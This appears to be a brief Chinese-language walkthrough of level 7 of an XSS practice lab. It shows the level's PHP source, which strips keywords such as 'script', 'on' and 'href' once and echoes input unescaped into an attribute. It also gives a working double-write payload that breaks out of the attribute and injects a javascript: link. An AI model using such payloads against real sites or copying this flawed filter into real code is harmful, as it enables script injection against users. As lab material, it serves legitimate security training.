源碼

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不錯！");window.location.href="level8.php?keyword=nice try!"; 
}
</script>
<title>歡迎來到level7</title>
</head>
<body>
<h1 align=center>歡迎來到level7</h1>
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level7.png></center>
<?php 
echo "<h3 align=center>payload的長度:".strlen($str6)."</h3>";
?>
</body>
</html>

它把一些關鍵詞換成了空所以雙寫?

?

"> <a hrehreff=javascrscriptipt:alert('xss')>xss</a>

這樣第七關就成功了?